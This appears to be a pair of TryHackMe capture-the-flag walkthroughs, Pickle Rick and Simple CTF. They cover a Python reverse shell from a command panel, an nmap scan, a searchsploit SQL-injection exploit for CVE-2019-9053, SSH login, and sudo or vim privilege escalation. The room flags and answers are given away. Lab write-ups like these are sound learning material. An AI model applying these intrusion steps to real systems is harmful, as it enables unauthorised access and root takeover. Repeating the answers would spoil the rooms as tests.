Going back to the command panel, lets see if we have access to python3. Typing python3 --version gives us a response with the version number, so we know we can use python3. Head over to the pentest monkey cheatsheet to grab the Python reverse shell. (BTW, pentest monkey is an amazing resource for spawning a reverse shell if you have command execution vulnerabilities, which is the command panel we have been using.)

Throw this line of code into sublime or vim to edit it, we need to change what version of python we are using and the IP address:

  • Change [python] -> [python3] - this is because we don't know if we have python, but we know we have python3.
  • Change [10.0.0.1] -> [your tun0 IP address we got before] - This sends the connection to that IP address, which netcat is listening to. The port number (1234) can stay the same because netcat is listening to that port number, but if you chose a different one during the netcat setup, make sure you change the port in the reverse shell code to the one you picked.

Throw that new line of code into the command execution panel and run it. Going back to our netcat, we see that we are on!

netcat connected to reverse shell

Lets explore this shell a little bit.

Running whoami tells us we are www-data. pwd tells us we are in /var/www/html We can read the clue.txt file and we get back "Look around the file system for the other ingredients" so lets go do that.

Heading into the /home directory we see two users: rick and ubuntu
The rick directory has just one file: second ingredient. Reading it gives us 1 jerry tear!!!! That is our second ingredient 🙂

The Third Ingredient

So, we got basically all we need from the Rick directory, what about checking out that /root directory. If you try, you can see that you aren't allowed in. This is because we don't have root privileges to get into that directory. Lets try and change that.

Typing sudo -l will tell us what commands the current user (www-data) is allowed (and forbidden) to run.

sudo l

The bottom shows that www-data may run (ALL) NOPASSWD: ALL, meaning that we can run nearly any command as sudo without a password. Knowing this, typing sudo -i will run a new shell as root, giving you that root access that we needed before.

sudo i

From here, we can find the flag in the /root directory and read it for the last ingredient: fleeb juice

flag

And that is really all there is! As you can see, sometimes sudo -l can reveal that you can run virtually any sudo command, which is a horrible mistake on the side of the security manager, but great for you. Happy hacking!

🙂

Simple CTF

Simple CTF

TO SEE THIS WRITE-UP WITH ALL IMAGES, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 11 August 2021

github.com/Armand-Alvarez

Room link on TryHackMe

Since this is a simple room, we will go through the questions and I will show my thought process and work to solve each question.

How many services are running under port 1000?

To figure this out, we need to run a specific nmap command:

nmap

Lets go over this command:

sudo nmap 10.10.127.163 -p1-1000 -T5 -oN nmap.txt

  • sudo nmap 10.10.127.163 - Runs nmap as a superuser on IP 10.10.127.163 (this was the IP of the box I needed to get into)

  • -p1-1000 - Scan ports 1-1000 (the first 1000 ports)

  • -T5 - Run the fastest scan you can (1 is slowest, 5 is fastest)

  • -oN nmap.txt - Put normal-output in the file nmap.txt

We see that there are 2 ports open in the first 1000: port 21 and port 80!

What is running on the higher port?

We only see 2 ports with our small 1-1000 scan, but if we run a larger scan we may see more information.

big nmap

Running our scan with -sC and -sV we see the addition of a port 2222 running ssh

What's the CVE you're using against the application?

If we go to the ip address on a web browser, we are just greeted with the default Apache2 page.

home

Running gobuster reveals /simple. Lets check it out.

simple

This is more interesting! Exploring the page also reveals the version of CMS:

simple version

Let's search this version on ExploitDB to see if it reveals anything.

Searchsploit is a kali command that can search for exploits found on exploitDB. We searched for the keywords cms, 2.2.8, made, and simple. It revealed an SQLI:

searchsploit

Running the same command with the -w argument will also show the exploit-db url, which will reveal the CVE number:

cve

Looks like we are using CVE-2019-9053.

To what kind of vulnerability is the application vulnerable?

We know this is a SQLI or an sql injection.

What's the password?

To use the exploit, lets copy it into the current working directory. (I recommend making a separate directory for each TryHackMe room you do.)

Our original searchsploit result gave part of the path: php/webapps/46635.py.

We can run the following command to copy it to your current working directory:

sudo cp /usr/share/exploitdb/exploits/php/webapps/46635.py exploit.py

The exploit database is kept in /usr/share for kali linux users, we know it is an exploit by our searchsploit results, and the rest of the path was given to us. I saved it as exploit.py in my directory.

Now lets try running the exploit:

exploit

If you type in python2 ./exploit.py, it will give you examples usage of the exploit, which is how I knew what command to run.

We see that the password is secret

Where can you login with the details obtained?

We can log into the FTP server as anonymous and download the only file in it. It contains nothing important, so we don't need the login details there.

Trying the ssh we need a username and password, lets try Mitch and our newly obtained password.

ssh mitch@10.10.127.163 -p 2222 - remember we have to use port 2222 because ssh is not running on port 22 on this box. Using the password we got earlier, we can successfully log in.

ssh

That shows us that the password can be used with ssh.

What's the user flag?

We can see one file in the directory we start in, which is Mitch's home directory. Reading the file gives us the flag: G00d j0b, keep up!

user flag

Is there any other user in the home directory? What's its name?

If you do ls /home, you can see another user named: sunbath

What can you leverage to spawn a privileged shell?

If you run the command root -l, it will show you what the user can run as root, and whether it requires a password:

sudo -l command

This shows us that Mitch may run /usr/bin/vim (Vim) without a password.

What's the root flag?

Head over to gtfobins, a great list of Unix binaries that can be used for privilege escalation. Type "vim" into the searchbar (because we know vim can be run as super user) and click on "Sudo".

vim sudo

Run this command on the ssh shell and you will become root:

becoming root

Congrats! You are now root simply because of a misconfigured vim.

root

The flag is W3ll d0n3. You made it!!

Happy hacking 🙂